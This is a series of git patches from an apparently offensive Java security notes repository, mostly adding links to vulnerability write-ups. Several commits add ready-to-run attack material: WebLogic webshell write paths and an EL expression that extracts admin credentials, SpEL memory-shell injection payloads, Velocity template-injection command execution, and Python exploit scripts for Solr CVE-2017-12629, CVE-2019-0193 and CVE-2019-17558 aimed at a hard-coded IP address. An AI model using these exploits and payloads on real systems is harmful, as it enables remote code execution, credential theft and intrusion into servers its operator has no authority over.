From e2739efb23208314e7993e725c8f7acdd80050f4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 26 Feb 2022 02:17:52 +0800 Subject: [PATCH 001/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 9a445e4..41c4596 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -24,3 +24,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2021/12/21 [绕过后缀安全检查进行文件上传](https://sec-in.com/article/647) **解决了条件竞争不知道文件名的问题,通过异常报错让程序停止向下执行绕过。(在multipart做文章)** + 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) From 31aac2488a00b32ee02daff92e144c6a28ecafff Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Mar 2022 14:48:15 +0800 Subject: [PATCH 002/332] Create Weblogic trick.md --- Weblogic/Weblogic trick.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 Weblogic/Weblogic trick.md diff --git a/Weblogic/Weblogic trick.md b/Weblogic/Weblogic trick.md new file mode 100644 index 0000000..6153bc9 --- /dev/null +++ b/Weblogic/Weblogic trick.md @@ -0,0 +1,29 @@ +## Weblogic trick + +## 写文件rce + +``` +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp +访问:\bea_wls_internal\shell.jsp + + +\server\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp +访问:\console\framework\skins\wlsconsole\images\shell.jsp + +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp +访问:\uddiexplorer\shell.jsp + +\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp + +访问:\项目名\shell.jsp +``` + +### 获得用户密码 + +https://github.com/TideSec/Decrypt_Weblogic_Password + +el表达式 + +```java +${pageContext.setAttribute("classLoader",Thread.currentThread().getContextClassLoader());pageContext.setAttribute("httpDataTransferHandler",pageContext.getAttribute("classLoader").loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"));pageContext.setAttribute("managementService", pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.ManagementService"));pageContext.setAttribute("authenticatedSubject",pageContext.getAttribute("classLoader").loadClass("weblogic.security.acl.internal.AuthenticatedSubject"));pageContext.setAttribute("propertyService",pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.PropertyService"));pageContext.setAttribute("KERNE_ID",pageContext.getAttribute("httpDataTransferHandler").getDeclaredField("KERNE_ID"));pageContext.getAttribute("KERNE_ID").setAccessible(true);pageContext.setAttribute("getPropertyService",managementService.getMethod("getPropertyService",pageContext.getAttribute("authenticatedSubject")));pageContext.getAttribute("getPropertyService").setAccessible(true);pageContext.setAttribute("prop",pageContext.getAttribute("getPropertyService").invoke(null,pageContext.getAttribute("KERNE_ID").get((null))));pageContext.setAttribute("getTimestamp1",propertyService.getMethod("getTimestamp1"));pageContext.getAttribute("getTimestamp1").setAccessible(true);pageContext.setAttribute("getTimestamp2",propertyService.getMethod("getTimestamp2"));pageContext.getAttribute("getTimestamp2").setAccessible(true);pageContext.setAttribute("username", pageContext.getAttribute("getTimestamp1").invoke(pageContext.getAttribute("prop")));pageContext.setAttribute("password",pageContext.getAttribute("getTimestamp2").invoke(pageContext.getAttribute("prop")));pageContext.getAttribute("username").concat("/").concat(pageContext.getAttribute("password"))} +``` From 720971490828437b667362bf3434645ec95a6108 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Mar 2022 15:47:12 +0800 Subject: [PATCH 003/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e8e39cd..ab82dd0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -103,3 +103,4 @@ + 2022/02/10 [OpenRASP 两次绕过](https://mp.weixin.qq.com/s/hkL8VPHnTgFsOCCrNlRpzQ) **1.修改特征值 2.在静态代码里面开启新线程调用恶意方法** + 2022/02/21 **java 中存在编译时执行函数(注解的方式执行)** + 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** ++ 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** From 0d3d23716129711c084f78a99ca41d1f2fa51534 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 7 Mar 2022 13:54:49 +0800 Subject: [PATCH 004/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ab82dd0..48db83a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -104,3 +104,4 @@ + 2022/02/21 **java 中存在编译时执行函数(注解的方式执行)** + 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** + 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** ++ 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** From 7bed13897db58ca01feaa379dde883ed9692ea6a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Mar 2022 13:06:15 +0800 Subject: [PATCH 005/332] Update Readme.md --- shell/SPEL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 9cceae9..27a4c75 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -43,6 +43,8 @@ T(org.springframework.util.SerializationUtils).deserialize(T(com.sun.org.apache. //内存木马 回显 T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun.org.apache.xml.internal.security.utils.Base64).decode('yv66vgAAADIAtQ....'),T(org.springframework.util.ClassUtils).getDefaultClassLoader()) +#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} + echo From d51d9bbede363b8f346814d82142b4b4549a7f71 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 14 Mar 2022 22:19:47 +0800 Subject: [PATCH 006/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 48db83a..dbf04f5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -105,3 +105,5 @@ + 2022/02/23 [原创 | emoji、shiro与log4j2漏洞](https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ) **通过fuzz报错记录log触发log4j2漏洞** + 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** + 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** ++ 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** + From 2a741f7137129a70e30bfda89b4fbf69d3307c86 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 14 Mar 2022 23:33:57 +0800 Subject: [PATCH 007/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dbf04f5..b5c0fb9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -106,4 +106,4 @@ + 2022/03/06 [Make JDBC Attacks Brilliant Again 番外篇](https://tttang.com/archive/1462/) **np!** + 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** + 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** - ++ 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** From a80bf7d03a9e2d944d7fa714b44986ddfa907162 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 15 Mar 2022 11:50:47 +0800 Subject: [PATCH 008/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5c0fb9..0130837 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -107,3 +107,4 @@ + 2022/03/07 [Java Web —— 从内存中Dump JDBC数据库明文密码](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485138&idx=1&sn=1229156e187fedd7b4aa4b1ac6c8f490&chksm=c053fdf8f72474eeb936fdfcefa43a74e2a7f661b9b98bff73330e5e661184440821047addf7&mpshare=1&scene=23&srcid=0307Aw2UzS1q0Fsdy5d2vqCD&sharer_sharetime=1646624025057&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) **在connect之前hook任何写入用户名密码** + 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** + 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** ++ 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** From 4a68f833ba3d25ab7dbdcb258934b0cdc9783e41 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 16 Mar 2022 21:57:18 +0800 Subject: [PATCH 009/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0130837..a8ae55d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -108,3 +108,4 @@ + 2022/03/14 [关于JavaWeb后门问题](https://wooyun.js.org/drops/%E6%94%BB%E5%87%BBJavaWeb%E5%BA%94%E7%94%A8[8]-%E5%90%8E%E9%97%A8%E7%AF%87.html) **思路不错,配置文件这些。。。** + 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** + 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** ++ 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** From 738230db9747da355273246e273aab4a0615f275 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 18 Mar 2022 11:45:31 +0800 Subject: [PATCH 010/332] Update exp.txt --- .../Velocity/exp.txt" | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" index e347b8a..2879893 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/exp.txt" @@ -4,3 +4,11 @@ $bizBean.class.class.forName('java.lang.Runtime').getMethod('getRuntime', null). #set($e="e") ${e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")} +回显 +#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) +#set($chr=$x.class.forName('java.lang.Character')) +#set($str=$x.class.forName('java.lang.String')) +#set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read())) +#end From 55beb3a855f98da6d64288c0db7e56d2a087b611 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 18 Mar 2022 11:49:19 +0800 Subject: [PATCH 011/332] Update README.md --- Solr/README.md | 186 ++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 185 insertions(+), 1 deletion(-) diff --git a/Solr/README.md b/Solr/README.md index 2edc0c1..38c86b8 100644 --- a/Solr/README.md +++ b/Solr/README.md @@ -1,4 +1,188 @@ # Apache Solr漏洞 **Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。** +>Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 + + +https://github.com/Imanfeng/Apache-Solr-RCE + +## CVE-2017-12629 + +[CVE-2017-12629 - Apache Solr XXE & RCE 漏洞分析](https://paper.seebug.org/425/) + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# xxe and rce +import requests +from urllib.parse import quote + +ip='101.35.196.173' +port='8983' + +''' + +"> +''' +def xxe(url): + exp = "%ext;%ent;]>&data;" + text = quote(exp, 'utf-8') + burp0_url = "http://"+ip+":"+port+"/solr/demo/select?q="+text+"&wt=xml&defType=xmlparser" + get = requests.get(burp0_url) + print(get.text) + +# 依据漏洞作者所披露的漏洞细节来看,RCE需要使用到SolrCloud Collections API,所以RCE只影响Solrcloud分布式系统。 +# /solr/admin/cores?wt=json 判断 +def rce(cmd):#不稳定,并且不知道路径 + burp0_url = "http://"+ip+":"+port+"/solr/demo/config" + burp0_headers = {"Accept": "*/*", "Accept-Language": "en", + "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", + "Connection": "close"} + burp0_json = { + "add-listener": {"args": ["-c", cmd], "class": "solr.RunExecutableListener", "dir": "/bin/", + "event": "postCommit", "exe": "sh", "name": "newlistener"}} + requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + + burp0_json2=[{"id": "test"}] + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2) + +if __name__ == '__main__': + # xxe("http://101.35.196.173:8080/do.dtd") + rce("touch /tmp/1") +``` + +## CVE-2019-0192 + +https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py + +## CVE-2019-0193 + +https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo#4785516e + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import requests +from urllib.parse import quote + +def getinfo(remote): + burp0_url = remote + "/solr/admin/cores?wt=json" + r = requests.get(burp0_url, verify=False, allow_redirects=False) + if r.status_code == 200: + a = list(r.json()['status'].keys()) + # ressource = "/solr/" + a[0] + "/config" + # print(ressource) + return a[0] + else: + exit(0) + +#需要出网 +def exp1(url,info,cmd): + burp0_url = url+"/solr/"+info+"/dataimport?_=1647571813629&indent=on&wt=json" + burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "Content-type": "application/x-www-form-urlencoded", "Connection": "close"} + burp0_data = {"command": "full-import", "verbose": "false", "clean": "false", "commit": "true", "debug": "true", + "core": "test", + "dataConfig": "\n \n \n \n \n \n", + "name": "dataimport"} + post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(post.json()['documents']) + +def exp2(url,info,cmd): + burp0url = url+"/solr/"+info+"/config" + headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", + "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", + "Content-Type": "application/json"} + burp0_json = {"set-property": {"requestDispatcher.requestParsers.enableStreamBody": True}} + requests.post(burp0url, headers=headers, json=burp0_json) + + exp=''' + + + + + + + + ''' + text = quote(exp, 'utf-8') + text ="%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22"+quote(cmd,'utf-8')+"%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%0a%20%20%20%20%20%20%20%20%20%20%20" + burp0_url = url+"/solr/"+info+"/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig="+text + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", + "content-type": "multipart/form-data; boundary=------------------------aceb88c2159f183f"} + burp0_data = "\r\n--------------------------aceb88c2159f183f\r\nContent-Disposition: form-data; name=\"stream.body\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n--------------------------aceb88c2159f183f--" + requests_post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(requests_post.json()['documents']) + +if __name__ == '__main__': + info = getinfo("http://101.35.196.173:8983") + # exp1("http://101.35.196.173:8983",info,"ls /tmp/") + exp2("http://101.35.196.173:8983",info,'ls /tmp/') +``` + +**jndi注入** + +``` + + + + + + + +``` + +## CVE-2019-17558 + +https://github.com/jas502n/solr_rce + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 +import requests + +url ="http://101.35.196.173:8983" +cmd ="ls" + +burp0_url = url + "/solr/admin/cores?wt=json" +r = requests.get(burp0_url, verify=False, allow_redirects=False) +a = list(r.json()['status'].keys()) + +burp0_url = url+"/solr/"+a[0]+"/config" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"} +burp0_json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}} +requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + +burp0_url = url+"/solr/"+a[0]+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} +get = requests.get(burp0_url, headers=burp0_headers) +print(get.text) +``` -Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 From 746863036eb65e413937aa349150000554bfc80d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 18 Mar 2022 11:49:59 +0800 Subject: [PATCH 012/332] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 25dff63..c8f82b9 100644 --- a/README.md +++ b/README.md @@ -21,6 +21,7 @@ + 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚 + 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 ++ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 From e3af77b41a0a43181c816f13143f012e8dffb991 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 20 Mar 2022 22:19:05 +0800 Subject: [PATCH 013/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a8ae55d..82cb663 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -109,3 +109,4 @@ + 2022/03/14 [weblogic下spring bean RCE的一些拓展](https://gv7.me/articles/2021/some-extensions-of-spring-bean-rce-under-weblogic/) **c0ny1师傅的文章一如既往的好** + 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** + 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** ++ 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 